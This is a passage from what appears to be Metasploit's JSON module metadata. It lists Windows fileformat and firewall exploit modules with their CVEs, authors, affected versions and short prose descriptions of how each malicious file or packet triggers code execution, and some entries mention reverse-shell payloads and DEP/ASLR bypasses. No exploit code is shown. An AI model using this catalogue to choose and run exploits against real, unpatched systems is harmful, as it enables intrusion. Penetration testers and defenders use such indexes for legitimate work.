"VideoCharge Studio 2.12.3.685"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/videocharge_studio.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/videocharge_studio",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/videolan_tivo": {
"name": "VideoLAN VLC TiVo Buffer Overflow",
"full_name": "exploit/windows/fileformat/videolan_tivo",
"rank": 400,
"disclosure_date": "2008-10-22",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in VideoLAN VLC 0.9.4.\n By creating a malicious TY file, a remote attacker could overflow a\n buffer and execute arbitrary code.",
"references": [
"CVE-2008-4654",
"OSVDB-49181",
"BID-31813"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VideoLAN VLC 0.9.4 (XP SP3 English)",
"VideoLAN VLC 0.9.2 (XP SP3 English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/videolan_tivo.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/videolan_tivo",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/videospirit_visprj": {
"name": "VeryTools Video Spirit Pro",
"full_name": "exploit/windows/fileformat/videospirit_visprj",
"rank": 400,
"disclosure_date": "2011-04-11",
"type": "exploit",
"author": [
"Acidgen",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in Video Spirit <= 1.70.\n When opening a malicious project file (.visprj), a stack buffer overflow occurs,\n resulting in arbitrary code execution.\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.",
"references": [
"CVE-2011-0499",
"CVE-2011-0500",
"OSVDB-70619",
"URL-http://www.corelan.be/advisories.php?id=CORELAN-11-001"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP/Vista/Win7/... Generic DEP & ASLR Bypass"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/videospirit_visprj.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/videospirit_visprj",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/visio_dxf_bof": {
"name": "Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability",
"full_name": "exploit/windows/fileformat/visio_dxf_bof",
"rank": 400,
"disclosure_date": "2010-05-04",
"type": "exploit",
"author": [
"Unknown",
"Shahin Ramezany <shahin@abysssec.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack based overflow vulnerability in the handling\n of the DXF files by Microsoft Visio 2002. Revisions prior to the release of\n the MS bulletin MS10-028 are vulnerable. The overflow occurs when the application\n is used to import a specially crafted DXF file, while parsing the HEADER section\n of the DXF file.\n\n To trigger the vulnerability an attacker must convince someone to insert a\n specially crafted DXF file to a new document, go to 'Insert' -> 'CAD Drawing'",
"references": [
"CVE-2010-1681",
"OSVDB-64446",
"BID-39836",
"URL-http://www.coresecurity.com/content/ms-visio-dxf-buffer-overflow",
"URL-https://www.exploit-db.com/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Visio 2002 English on Windows XP SP3 Spanish",
"Visio 2002 English on Windows XP SP3 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/visio_dxf_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/visio_dxf_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/visiwave_vwr_type": {
"name": "VisiWave VWR File Parsing Vulnerability",
"full_name": "exploit/windows/fileformat/visiwave_vwr_type",
"rank": 500,
"disclosure_date": "2011-05-20",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>",
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "This module exploits a vulnerability found in VisiWave's Site Survey Report application.\n When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type'\n property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text',\n 'Image'), but if a match isn't found, the function that's supposed to handle this routine\n ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10]\n instruction. This allows attackers to overwrite it with any arbitrary value, and results code\n execution. A patch is available at visiwave.com; the fix is done by XORing the return value as\n null if no match is found, and then it is validated before use.\n\n NOTE: During installation, the application will register two file handles, VWS and VWR, which allows a\n victim user to 'double click' the malicious VWR file and execute code. This module was also built\n to bypass ASLR and DEP.",
"references": [
"CVE-2011-2386",
"OSVDB-72464",
"URL-http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html",
"URL-http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3/Windows 7 SP0"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/visiwave_vwr_type.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/visiwave_vwr_type",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/vlc_mkv": {
"name": "VLC Media Player MKV Use After Free",
"full_name": "exploit/windows/fileformat/vlc_mkv",
"rank": 500,
"disclosure_date": "2018-05-24",
"type": "exploit",
"author": [
"Eugene Ng - GovTech",
"Winston Ho - GovTech"
],
"description": "This module exploits a use after free vulnerability in\n VideoLAN VLC =< 2.2.8. The vulnerability exists in the parsing of\n MKV files and affects both 32 bits and 64 bits.\n\n In order to exploit this, this module will generate two files:\n The first .mkv file contains the main vulnerability and heap spray,\n the second .mkv file is required in order to take the vulnerable code\n path and should be placed under the same directory as the .mkv file.\n\n This module has been tested against VLC v2.2.8. Tested with payloads\n windows/exec, windows/x64/exec, windows/shell/reverse_tcp,\n windows/x64/shell/reverse_tcp. Meterpreter payloads if used can\n cause the application to crash instead.",
"references": [
"CVE-2018-11529",
"URL-https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11529",
"EDB-44979"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VLC 2.2.8 on Windows 10 x86",
"VLC 2.2.8 on Windows 10 x64"
],
"mod_time": "2018-10-10 12:22:47 +0000",
"path": "/modules/exploits/windows/fileformat/vlc_mkv.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/vlc_mkv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/vlc_modplug_s3m": {
"name": "VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/vlc_modplug_s3m",
"rank": 200,
"disclosure_date": "2011-04-07",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits an input validation error in libmod_plugin as\n included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9\n are affected. By creating a malicious S3M file, a remote attacker\n could execute arbitrary code.\n\n Although other products that bundle libmodplug may be vulnerable, this\n module was only tested against VLC.\n\n NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n permanently enable NX support on machines that support it. As such,\n this module is capable of bypassing DEP, but not ASLR.",
"references": [
"CVE-2011-1574",
"OSVDB-72143",
"URL-http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b",
"URL-https://seclists.org/fulldisclosure/2011/Apr/113"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VLC 1.1.8 on Windows XP SP3"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/vlc_modplug_s3m",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/vlc_realtext": {
"name": "VLC Media Player RealText Subtitle Overflow",
"full_name": "exploit/windows/fileformat/vlc_realtext",
"rank": 400,
"disclosure_date": "2008-11-05",
"type": "exploit",
"author": [
"Tobias Klein",
"SkD",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow vulnerability in\n VideoLAN VLC < 0.9.6. The vulnerability exists in the parsing of\n RealText subtitle files.\n\n In order to exploit this, this module will generate two files:\n The .mp4 file is used to trick your victim into running. The .rt file\n is the actual malicious file that triggers the vulnerability, which\n should be placed under the same directory as the .mp4 file.",
"references": [
"OSVDB-49809",
"CVE-2008-5036",
"BID-32125",
"URL-http://www.trapkit.de/advisories/TKADV2008-011.txt",
"URL-http://www.videolan.org/security/sa0810.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VLC 0.9.4 on Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/vlc_realtext.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/vlc_realtext",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/vlc_smb_uri": {
"name": "VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow",
"full_name": "exploit/windows/fileformat/vlc_smb_uri",
"rank": 500,
"disclosure_date": "2009-06-24",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in the Win32AddConnection\n function of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are\n reportedly affected.\n\n This vulnerability is only present in Win32 builds of VLC.\n\n This payload was found to work with the windows/exec and\n windows/meterpreter/reverse_tcp payloads. However, the\n windows/meterpreter/reverse_ord_tcp was found not to work.",
"references": [
"BID-35500",
"OSVDB-55509",
"CVE-2009-2484",
"URL-http://git.videolan.org/?p=vlc.git;a=commit;h=e60a9038b13b5eb805a76755efc5c6d5e080180f",
"EDB-9029"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"vlc 0.9.9 on Windows XP SP3"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/vlc_smb_uri.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/vlc_smb_uri",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/vlc_webm": {
"name": "VideoLAN VLC MKV Memory Corruption",
"full_name": "exploit/windows/fileformat/vlc_webm",
"rank": 400,
"disclosure_date": "2011-01-31",
"type": "exploit",
"author": [
"Dan Rosenberg"
],
"description": "This module exploits an input validation error in VideoLAN VLC\n < 1.1.7. By creating a malicious MKV or WebM file, a remote attacker\n could execute arbitrary code.\n\n NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n permanently enable NX support on machines that support it.",
"references": [
"OSVDB-70698",
"CVE-2011-0531",
"BID-46060",
"URL-http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456",
"URL-http://www.videolan.org/security/sa1102.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VLC 1.1.6 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/vlc_webm.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/vlc_webm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/vuplayer_cue": {
"name": "VUPlayer CUE Buffer Overflow",
"full_name": "exploit/windows/fileformat/vuplayer_cue",
"rank": 400,
"disclosure_date": "2009-08-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack based overflow in VUPlayer <= 2.49. When\n the application is used to open a specially crafted cue file, a buffer is overwritten allowing\n for the execution of arbitrary code.",
"references": [
"OSVDB-64581",
"BID-33960"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VUPlayer 2.49"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/vuplayer_cue.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/vuplayer_cue",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/vuplayer_m3u": {
"name": "VUPlayer M3U Buffer Overflow",
"full_name": "exploit/windows/fileformat/vuplayer_m3u",
"rank": 400,
"disclosure_date": "2009-08-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack over flow in VUPlayer <= 2.49. When\n the application is used to open a specially crafted m3u file, an buffer is overwritten allowing\n for the execution of arbitrary code.",
"references": [
"CVE-2006-6251",
"OSVDB-31710"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VUPlayer 2.49"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/vuplayer_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/vuplayer_m3u",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/watermark_master": {
"name": "Watermark Master Buffer Overflow (SEH)",
"full_name": "exploit/windows/fileformat/watermark_master",
"rank": 300,
"disclosure_date": "2013-11-01",
"type": "exploit",
"author": [
"metacom",
"Andrew Smith"
],
"description": "This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when\n processing a specially crafted .WCF file. This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of Watermark Master to open a malicious .WCF file.",
"references": [
"OSVDB-99226",
"CVE-2013-6935",
"EBD-29327"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 x32 - Watermark Master 2.2.23",
"Windows 7 x64 - Watermark Master 2.2.23"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/watermark_master.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/watermark_master",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/winamp_maki_bof": {
"name": "Winamp MAKI Buffer Overflow",
"full_name": "exploit/windows/fileformat/winamp_maki_bof",
"rank": 300,
"disclosure_date": "2009-05-20",
"type": "exploit",
"author": [
"Monica Sojeong Hong",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow in Winamp 5.55. The flaw\n exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,\n where memmove is used in an insecure way with user controlled data.\n\n To exploit the vulnerability the attacker must convince the victim to install the\n generated mcvcore.maki file in the \"scripts\" directory of the default \"Bento\" skin,\n or generate a new skin using the crafted mcvcore.maki file. The module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2009-1831",
"OSVDB-54902",
"BID-35052",
"EDB-8783",
"EDB-8772",
"EDB-8770",
"EDB-8767",
"URL-http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Winamp 5.55 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-09-22 18:49:09 +0000",
"path": "/modules/exploits/windows/fileformat/winamp_maki_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/winamp_maki_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/winrar_ace": {
"name": "RARLAB WinRAR ACE Format Input Validation Remote Code Execution",
"full_name": "exploit/windows/fileformat/winrar_ace",
"rank": 600,
"disclosure_date": "2019-02-05",
"type": "exploit",
"author": [
"Nadav Grossman",
"Imran E. Dawoodjee <imrandawoodjee.infosec@gmail.com>"
],
"description": "In WinRAR versions prior to and including 5.61, there is path traversal vulnerability\n when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename\n field is manipulated with specific patterns, the destination (extraction) folder is\n ignored, thus treating the filename as an absolute path. This module will attempt to\n extract a payload to the startup folder of the current user. It is limited such that\n we can only go back one folder. Therefore, for this exploit to work properly, the user\n must extract the supplied RAR file from one folder within the user profile folder\n (e.g. Desktop or Downloads). User restart is required to gain a shell.",
"references": [
"CVE-2018-20250",
"EDB-46552",
"BID-106948",
"URL-https://research.checkpoint.com/extracting-code-execution-from-winrar/",
"URL-https://apidoc.roe.ch/acefile/latest/",
"URL-http://www.hugi.scene.org/online/coding/hugi%2012%20-%20coace.htm"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"RARLAB WinRAR <= 5.61"
],
"mod_time": "2019-04-24 05:43:28 +0000",
"path": "/modules/exploits/windows/fileformat/winrar_ace.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/winrar_ace",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/winrar_name_spoofing": {
"name": "WinRAR Filename Spoofing",
"full_name": "exploit/windows/fileformat/winrar_name_spoofing",
"rank": 600,
"disclosure_date": "2009-09-28",
"type": "exploit",
"author": [
"chr1x",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a filename spoofing vulnerability in WinRAR. The vulnerability exists\n when opening ZIP files. The file names showed in WinRAR when opening a ZIP file come from\n the central directory, but the file names used to extract and open contents come from the\n Local File Header. This inconsistency allows to spoof file names when opening ZIP files\n with WinRAR, which can be abused to execute arbitrary code, as exploited in the wild in\n March 2014",
"references": [
"OSVDB-62610",
"BID-66383",
"URL-http://securityaffairs.co/wordpress/23623/hacking/winrar-zero-day.html",
"URL-http://an7isec.blogspot.co.il/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/winrar_name_spoofing.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/winrar_name_spoofing",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/wireshark_mpeg_overflow": {
"name": "Wireshark wiretap/mpeg.c Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/wireshark_mpeg_overflow",
"rank": 400,
"disclosure_date": "2014-03-20",
"type": "exploit",
"author": [
"Wesley Neelen",
"j0sm1"
],
"description": "This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5\n by generating a malicious file.",
"references": [
"CVE-2014-2299",
"URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843",
"URL-http://www.wireshark.org/security/wnpa-sec-2014-04.html",
"BID-66066"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"WinXP SP3 Spanish (bypass DEP)",
"WinXP SP2/SP3 English (bypass DEP)"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/wireshark_mpeg_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/wireshark_packet_dect": {
"name": "Wireshark packet-dect.c Stack Buffer Overflow (local)",
"full_name": "exploit/windows/fileformat/wireshark_packet_dect",
"rank": 400,
"disclosure_date": "2011-04-18",
"type": "exploit",
"author": [
"Paul Makowski",
"sickness",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in Wireshark <= 1.4.4\n When opening a malicious .pcap file in Wireshark, a stack buffer occurs,\n resulting in arbitrary code execution.\n\n Note: To exploit the vulnerability remotely with Scapy: sendp(rdpcap(\"file\")).",
"references": [
"CVE-2011-1591",
"OSVDB-71848",
"URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838",
"URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836",
"EDB-17185"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Win32 Universal (Generic DEP & ASLR Bypass)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/wireshark_packet_dect.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/wireshark_packet_dect",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/wm_downloader_m3u": {
"name": "WM Downloader 3.1.2.2 Buffer Overflow",
"full_name": "exploit/windows/fileformat/wm_downloader_m3u",
"rank": 300,
"disclosure_date": "2010-07-28",
"type": "exploit",
"author": [
"fdisk",
"dookie"
],
"description": "This module exploits a buffer overflow in WM Downloader v3.1.2.2. When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.",
"references": [
"OSVDB-66911",
"EDB-14497"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/wm_downloader_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/wm_downloader_m3u",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/xenorate_xpl_bof": {
"name": "Xenorate 2.50 (.xpl) Universal Local Buffer Overflow (SEH)",
"full_name": "exploit/windows/fileformat/xenorate_xpl_bof",
"rank": 500,
"disclosure_date": "2009-08-19",
"type": "exploit",
"author": [
"hack4love <hack4love@hotmail.com>",
"germaya_x",
"loneferret",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Xenorate 2.50\n by creating a specially crafted xpl file.",
"references": [
"OSVDB-57162",
"EDB-10371"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2 / SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/xenorate_xpl_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/xion_m3u_sehbof": {
"name": "Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/xion_m3u_sehbof",
"rank": 500,
"disclosure_date": "2010-11-23",
"type": "exploit",
"author": [
"hadji samir <s-dz@hotmail.fr>",
"corelanc0d3r <peter.ve@corelan.be>",
"digital1",
"jduck <jduck@metasploit.com>",
"m_101"
],
"description": "This module exploits a stack buffer overflow in Xion Audio Player prior to version\n 1.0.126. The vulnerability is triggered when opening a malformed M3U file that\n contains an overly long string. This results in overwriting a\n structured exception handler record.",
"references": [
"OSVDB-66912",
"EDB-14517",
"EDB-14633",
"EDB-15598"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Xion Audio Player v1.0.126 XP Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/xion_m3u_sehbof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/xradio_xrl_sehbof": {
"name": "xRadio 0.95b Buffer Overflow",
"full_name": "exploit/windows/fileformat/xradio_xrl_sehbof",
"rank": 300,
"disclosure_date": "2011-02-08",
"type": "exploit",
"author": [
"b0telh0 <me@gotgeek.com.br>"
],
"description": "This module exploits a buffer overflow in xRadio 0.95b.\n Using the application to import a specially crafted xrl file,\n a buffer overflow occurs allowing arbitrary code execution.",
"references": [
"CVE-2008-2789",
"BID-46290",
"EDB-16141"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/xradio_xrl_sehbof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/zahir_enterprise_plus_csv": {
"name": "Zahir Enterprise Plus 6 Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/zahir_enterprise_plus_csv",
"rank": 300,
"disclosure_date": "2018-09-28",
"type": "exploit",
"author": [
"f3ci",
"modpr0be"
],
"description": "This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.\n The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters\n via Import from other File. This results in overwriting a structured exception handler record.",
"references": [
"CVE-2018-17408",
"EDB-45505"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Zahir Enterprise Plus 6 <= build 10b"
],
"mod_time": "2018-10-04 10:10:09 +0000",
"path": "/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/zahir_enterprise_plus_csv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/zinfaudioplayer221_pls": {
"name": "Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/zinfaudioplayer221_pls",
"rank": 400,
"disclosure_date": "2004-09-24",
"type": "exploit",
"author": [
"Trancek <trancek@yashira.org>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Zinf.\n This functionality has not been tested in this module.",
"references": [
"CVE-2004-0964",
"OSVDB-10416",
"EDB-7888",
"BID-11248"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Zinf Universal 2.2.1"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/zinfaudioplayer221_pls",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/firewall/blackice_pam_icq": {
"name": "ISS PAM.dll ICQ Parser Buffer Overflow",
"full_name": "exploit/windows/firewall/blackice_pam_icq",
"rank": 500,
"disclosure_date": "2004-03-18",
"type": "exploit",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "This module exploits a stack buffer overflow in the ISS products that use\n the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation\n will result in arbitrary code execution as LocalSystem. This exploit\n only requires 1 UDP packet, which can be both spoofed and sent to a broadcast\n address.\n\n The ISS exception handler will recover the process after each overflow, giving\n us the ability to bruteforce the service and exploit it multiple times.",
"references": [
"CVE-2004-0362",
"OSVDB-4355",
"URL-http://www.eeye.com/html/Research/Advisories/AD20040318.html"
],
"platform": "Windows",
"arch": "",
"rport": 1,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Bruteforce",
"Bruteforce iis-pam1.dll",
"Bruteforce NT 4.0",
"iis-pam1.dll 3.6.06",
"iis-pam1.dll 3.6.11",
"WinNT SP3/SP4/SP5",
"WinNT SP4/SP5",
"WinNT SP5/SP6 - advapi32",
"WinNT SP3/SP5/SP6 - shell32",
"WinNT SP5/SP6 - mswsock",
"WinXP SP0/SP1 - shell32",
"WinXP SP0/SP1 - atl",
"WinXP SP0/SP1 - atl",
"WinXP SP0/SP1 - ws2_32",
"WinXP SP0/SP1 - mswsock",
"Windows 2000 Pro SP4 English",
"Win2000 SP0 - SP4",
"Win2000 SP2/SP3 - samlib",
"Win2000 SP0/SP1 - activeds",
"Windows XP Pro SP0 English",
"Windows XP Pro SP1 English",
"WinXP SP0 - SP1",
"Win2003 SP0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/firewall/blackice_pam_icq.rb",
"is_install_path": true,
"ref_name": "windows/firewall/blackice_pam_icq",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/firewall/kerio_auth": {
"name": "Kerio Firewall 2.1.4 Authentication Packet Overflow",
"full_name": "exploit/windows/firewall/kerio_auth",
"rank": 200,
"disclosure_date": "2003-04-28",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Kerio Personal Firewall\n administration authentication process. This module has only been tested\n against Kerio Personal Firewall 2 (2.1.4).",
"references": [
"CVE-2003-0220",
"OSVDB-6294",
"BID-7180"
],
"platform": "Windows",
"arch": "",
"rport": 44334,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro SP4 English",
"Windows XP Pro SP0 English",
"Windows XP Pro SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
